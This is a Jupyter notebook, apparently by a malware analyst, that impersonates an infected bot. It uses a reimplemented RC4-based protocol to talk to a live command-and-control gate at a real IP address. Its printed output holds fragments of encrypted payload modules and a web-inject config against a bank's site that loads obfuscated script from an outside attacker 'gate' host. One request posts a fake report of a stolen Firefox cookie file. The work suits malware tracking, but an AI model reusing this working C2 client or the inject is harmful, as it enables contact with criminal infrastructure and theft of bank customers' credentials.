In [1]:
import requests
import struct
import hashlib
import urllib3
from Crypto.Cipher import ARC4

In [2]:
urllib3.disable_warnings()

In [3]:
proxies = {
    "http":"http://127.0.0.1:8080",
    "https":"http://127.0.0.1:8080"
}

# Setting
* `c2_gate` is the gate.php of the server
* `c2_key` is the encryption key extracted from the bot config file
* `botnet_id` is the botnet ID from the config file
* `header_size`, `md5_size`, `item_header_size` you shouldn't need to change


In [4]:
c2_gate = "https://45.72.3.132/web7643/gate.php"
c2_key = "90f1e19e2306648e9e22059d47f36016"
header_size = 48
md5_size = 32
item_header_size = 16

In [5]:
# Initialize RC4
def rc4_init(key):
    _hash = [None] * 256
    _box = [None] * 256
    _keylen = len(key)
    
    for x in range(256):
        _hash[x] = ord(key[x % _keylen])
        _box[x] = x
    
    y = 0
    for x in range(256):
        y = (y + _box[x] + _hash[x]) % 256
        tmp = _box[x]
        _box[x] = _box[y]
        _box[y] = tmp
    
    return _box

# Encrypt RC4
def rc4(data, key):
    _len = len(data)
    z = y = 0
    for x in range(_len):
        z = (z + 1) % 256
        y = (y + key[z]) % 256
        tmp = key[z]
        key[z] = key[y]
        key[y] = tmp
        data[x] = data[x] ^ (key[((key[z] + key[y]) % 256)])
    return data

# Visual Decrypt
def v_decrypt(data):
    _len = len(data)
    for x in reversed(range(1, _len)):
        data[x] = data[x] ^ data[x-1]
    return data

# Visual Encrypt
def v_encrypt(data):
    _len = len(data)
    for x in range(_len):
        data[x] = data[x] ^ data[x-1]
    return data

In [6]:
# Complete encrypt sequence
def encrypt(data):
    key = rc4_init(c2_key)
    data = v_encrypt(list(data))
    data = rc4(data, key=key)
    return data

# Complete decrypt sequence
def decrypt(data):
    key = rc4_init(c2_key)
    data = rc4(list(data), key=key)
    data = v_decrypt(data)
    return data

# Convert output from decrypt/encrypt into bytes object
def bytes2str(data):
    return bytes(bytearray(data))

In [7]:
# Send complete request to C2 and get decrypted data
def send_request(data):
    r = requests.post(c2_gate, data=bytes2str(encrypt(data)), proxies=proxies, verify=False)
    return bytes2str(decrypt(r.content))

In [8]:
def parse_response(data):
    header = data[:header_size]
    _md5 = header[md5_size:].hex()
    body = data[header_size:]
    parsed_data = {}
    #print("MD5: {}".format(_md5))
    x = 0
    while x < len(body):
        header_offset = x+item_header_size
        k = struct.unpack('IIII', body[x:header_offset])
        parsed_data[k[0]] = body[header_offset:header_offset+k[2]]
        x += item_header_size+k[2]
    return parsed_data
        

In [9]:
def pack_data(data):
    body = []
    for record_id, content in data.items():
        record_header = struct.pack('IIII', record_id, 0, len(content), 0)
        body.append(record_header + content)
    finished_body = b''.join(body)
    header = b''.join([b'0'*(md5_size), hashlib.md5(finished_body).digest()])
    return b''.join([header, finished_body])

In [67]:
def convert_to_int(hstr):
    return struct.unpack('I', bytearray.fromhex(hstr)) # 'C0A8641B'

In [16]:
def sr(data):
    resp = send_request(pack_data(data))
    return parse_response(resp)

# Talking to the bot
To talk to the bot you need to create a list of properties dictionary, for example `10002` is botnet id, while `10001` is bot's name.

Then pass the dictionary via `pack_data` to `send_request` like in example. 

Sometimes the C2 response will be parsable, but when its a binary, the parse_reponse will fail. Decoding binaries is not implemented here.

In [11]:
checkin_request = {
    10002: b'web7-pit14',
    10001: b'USER-PC_2EBFF1F24207DC1B',
    10006: b'0'
}

In [12]:
sr(checkin_request)

{0: b'', 1936028023: b'bbwjvmuerqnyttqyteklyumwtypkfciszpwjpizdokldcllqcpzwjlexbddsoxvernlfudmgrlqmazmurzizdpgacqctclunjmsvsssgrdfgyfxoiewzsjrijmddklaokvteohkdeyqilcjqnlxaobkmbtsgvvvflwjwkifzdgqyajyoomlkbajxgwpanynkuhlbv'}


In [13]:
payload_request = {
    10002: b'web7-pit14',
    10001: b'USER-PC_2EBFF1244207DC1B',
    11014: struct.pack('I', 1006),
    11015: struct.pack('I', 16779264)
}

In [17]:
sr(payload_request)[7895040][:200]

b'M\x81\xecu<\x01\x1aSP\x02\x1d\x08\x15\x13\x0cMC\x02\x0f\x00\x01\x1bTB\x07ER\x07\x1bNI\x07Nd\x0b\x1csM\x02\x0b\x01K\n$\x00P\x15E\x00LM\x05\x04\xde\xad\x88\xa6]\x00\x00\x00\x00\x00\x00\x00\xe0\xe0\x02#*\n\x0f\x0e\x00r{\t\x00\xda\xda\x00\x00\x00\x00\x00>&\x1b\x03\x00\x10\x10\x00\x00\x00\x00\x00\x00\x00\x00\x10\x10\x10\x10\x00\x00\x02\x02\x00\x06\x06\x00\x00\x00\x00\x00\x00\x06\x06\x00\x00\x00\x00\x00\x00\x00\xb0\xba\n\x00\x04\x04\x00\x00\x00\x00\x00\x02\x02@A\x01\x00\x10\x10\x00\x10\x10\x00\x00\x00\x10\x10\x00\x10\x10\x00\x00\x00\x00\x00\x10\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00N\x9e\xd9\tPP\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'

In [18]:
payload_request = {
    10002: b'web7-pit14',
    10001: b'USER-PC_2EBFF1244207DC1B',
    11014: struct.pack('I', 1001),
    11015: struct.pack('I', 16779264)
}

In [19]:
sr(payload_request)[7895040][:200]

b'M\x81\xecu<\x01\x1aSP\x02\x1d\x08\x15\x13\x0cMC\x02\x0f\x00\x01\x1bTB\x07ER\x07\x1bNI\x07Nd\x0b\x1csM\x02\x0b\x01K\n$\x00P\x15E\x00d\xe2\x83\x05\xe8\x94\x86\xa7]\x00\x00\x00\x00\x00\x00\x00\xf0\xf0"\x02+\t\x0c\x0e\x00\xce\xcb\x05\x00\x96\x96\x00\x00\x00\x00\x00\x99\'\xbf\x01\x00\x10\x10\x00\x00\x00\x00\x80\x81\x01\x00\x00\x00\x10\x10\x00\x00\x02\x02\x00\x06\x06\x00\x00\x00\x00\x00\x00\x06\x06\x00\x00\x00\x00\x00\x00\x00\xe0\xe6\x06\x00\x04\x04\x00\x00\x00\x00\x00\x02\x02`a\x01\x00\x10\x10\x00\x00\x00\x00\x00\x10\x10\x00\x00\x00\x00\x00\x00\x00\x10\x10\x00\x00\x00\x00\x00\x10\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00z\x90\xef\x05((\x00\x00\x00\x00\x00'

In [20]:
payload_request = {
    10002: b'web7-pit14',
    10001: b'USER-PC_2EBFF1244207DC1B',
    11014: struct.pack('I', 1003),
    11015: struct.pack('I', 1)
}

In [23]:
sr(payload_request)[8421376][:200]

b"M\x81\xecu<\x01\x1aSP\x02\x1d\x08\x15\x13\x0cMC\x02\x0f\x00\x01\x1bTB\x07ER\x07\x1bNI\x07Nd\x0b\x1csM\x02\x0b\x01K#\x00\x07.$\x00\x00\x00\x00\x00\x00P\x15E\x00LM\x13\x12\xd5\xfc\x0f{]2>\x0c(8\x10\x00\xe0\xe0\x06'*\n\x03\x1b\x19v\x7f\t\x00&-\x0b\x00\n\n\x00\x00\x14\x14\x00\x00\x10\x10\x00\x00\x90\x99\t\x00\x00\xe0\x81a\x10\x10\x00\x00\x02\x02\x00\x04\x04\x00\x00\x01\x01\x00\x00\x04\x04\x00\x00\x00\x00\x00\x00\x00\xe0\xec\x0c\x00\x06\x06\x00DL\x07\x0f\x03\x03\x00\x00\x00\x00  \x00\x10\x10\x00\x00\x00\x10\x10\x00\x10\x10\x00\x00\x00\x00\x00\x10\x10\x00\x00\x00\xf0\xfa\n\xdf\xff \x00\x00 +\x0bHD\x0c\x00\x00P[\x0b\xa8\xac\x04\x00\x00\x00\x00"

In [27]:
payload_request = {
    10002: b'web7-pit14',
    10001: b'USER-PC_2EBFF1244207DC1B',
    11014: struct.pack('I', 1004),
    11015: struct.pack('I', 1)
}

In [28]:
sr(payload_request)[8421376][:200]

b'M\x81\xecu<\x01\x1aSP\x02\x1d\x08\x15\x13\x0cMC\x02\x0f\x00\x01\x1bTB\x07ER\x07\x1bNI\x07Nd\x0b\x1csM\x02\x0b\x01K#\x00\x07.$\x00\x00\x00\x00\x00\x00P\x15E\x00LM\x06\x07W!\xa8\x9cB\x00\x00\x00\x00\x00\x00\x00\xe0\xe0\x0e,)\n\x03:8\xfe\xfe\x00\x00"#\x01\x00\x02\x02\x00\x00\x10\x10\x00\x00\x10\x10\x00\x00\x10\x11\x01\x00\x00\xb8\xd9a\x10\x10\x00\x00\x02\x02\x00\x04\x04\x00\x00\x01\x01\x02\x02\x04\x04\x00\x00\x00\x00\x00\x00\x00\x80\x81\x01\x00\x04\x04\x00\x9e\x8c\x10\x02\x03\x03\x00\x00\x00\x00  \x00\x10\x10\x00\x00\x00\x10\x10\x00\x10\x10\x00\x00\x00\x00\x00\x10\x10\x00\x00\x0001\x01VP\x06\x00\x00@A\x01HK\x03\x00\x00PQ\x01XH\x10\x00\x00\x00\x00'

In [31]:
payload_request = {
    10002: b'web7-pit14',
    10001: b'USER-PC_2EBFF1244207DC1B',
    11014: struct.pack('I', 1007),
    11015: struct.pack('I', 16778496)
}

In [34]:
sr(payload_request)[7895040][:200]

b'M\x81\xecu<\x01\x1aSP\x02\x1d\x08\x15\x13\x0cMC\x02\x0f\x00\x01\x1bTB\x07ER\x07\x1bNI\x07Nd\x0b\x1csM\x02\x0b\x01K\n$\x00P\x15E\x00LM\x04\x05z\x0f\x8f\xa7]\x00\x00\x00\x00\x00\x00\x00\xe0\xe0\x02#*\n\x0f\x0e\x00\xba\xb9\x03\x00\xd4\xd4\x00\x00\x00\x00\x00\xf1y\x88\x00\x00\x10\x10\x00\x00\x00\x00\x00\x00\x00\x00\x10\x10\x10\x10\x00\x00\x02\x02\x00\x06\x06\x00\x00\x00\x00\x00\x00\x06\x06\x00\x00\x00\x00\x00\x00\x00\xc0\xc4\x04\x00\x04\x04\x00\x00\x00\x00\x00\x02\x02@A\x01\x00\x10\x10\x00\x10\x10\x00\x00\x00\x10\x10\x00\x10\x10\x00\x00\x00\x00\x00\x10\x10\x00\x00\xb0\xb7\x03\x04hh\x00\x00\x18\x10\x0c\x04\xf0\xf0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'

In [63]:
# Change 10001 to get js injects
payload_request = {
    10001: b'USER-PC_5EBFF1244207DC1B',
    10002: b'web7-pit14',
    10003: struct.pack('I', 16779264),
    10012: b'\x06\x01\xB1\x1D\x09',
    10016: struct.pack('I', 459581632),
    10025: b'web7-pit14',
    10020: b'[System Process]|System|smss.exe|csrss.exe',
    10023: struct.pack('I', 2),
    10024: struct.pack('I', 1),
}

In [64]:
sr(payload_request)

{11012: b';#########################################################################################################\r\n;#                                            53 REPLACER                                                #\r\n;#########################################################################################################\r\n\r\nset_url http*://*.53.com* GP\r\n\r\ndata_before\r\nftb-dtm-init-ob"></script>\r\ndata_end\r\ndata_inject\r\n<inj></inj>\r\ndata_end\r\ndata_after\r\ndata_end\r\n\r\ndata_before\r\ninit.js"></script>\r\ndata_end\r\ndata_inject\r\n<inj></inj>\r\ndata_end\r\ndata_after\r\ndata_end\r\n\r\ndata_before\r\n<inj></inj>\r\ndata_end\r\ndata_inject\r\n<script> var home_link = "https://domain-apps-free.com/53repadmin";var gate_link = home_link+"/gate.php";var pkey = "Bc5rw12";eval(function(p,a,c,k,e,r){e=function(c){return(c<a?\'\':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!\'\'.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c

In [65]:
# Change 10001 to get js injects
payload_request = {
    10001: b'USER-PC_5EBFF1244207DC1B',
    10002: b'web7-pit14',
    11030: struct.pack('I', 9),
    11031: struct.pack('I', 0),
    11032: struct.pack('I', 0),
    11033: b'Finish "C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\nltxvmn2.default\cookies.sqlite'
}

In [66]:
sr(payload_request)

{0: b'', 1752725364: b'czwptawesvcuvkowz'}